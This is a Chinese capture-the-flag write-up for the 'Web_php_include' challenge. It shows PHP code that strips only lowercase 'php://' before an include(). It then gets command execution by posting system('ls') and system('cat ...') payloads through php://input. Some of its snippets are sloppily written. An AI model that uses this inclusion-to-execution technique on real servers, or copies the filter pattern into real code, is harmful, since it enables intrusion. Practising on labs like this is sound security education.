Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
Chen--Xing10 小时前
2025鹏城杯 -- Crypto -- RandomAudit详解
python·密码学·ctf·鹏城杯
捧 花17 小时前
Go Web 中 WebSocket 原理与实战详解
网络·后端·websocket·网络协议·http·golang·web
pandarking18 小时前
[CTF]攻防世界:easy_laravel 学习
java·学习·web安全·laravel·ctf
曲幽19 小时前
Flask路由入门指南:从基础定义到优先级与动态路由转换器
python·flask·web·route·path
pandarking2 天前
[CTF]攻防世界:web-unfinish(sql二次注入)
前端·数据库·sql·web安全·ctf
小白勇闯网安圈3 天前
bug、Confusion1、ics-07、
网络安全·php·web
闲人编程3 天前
后台任务与WebSocket实时应用
websocket·web·实时·codecapsule·后台协议·实时应用
小白勇闯网安圈3 天前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web
小白勇闯网安圈4 天前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
wyjcxyyy4 天前
Polar-MISC-WEB(困难)
web·ctf·misc·polar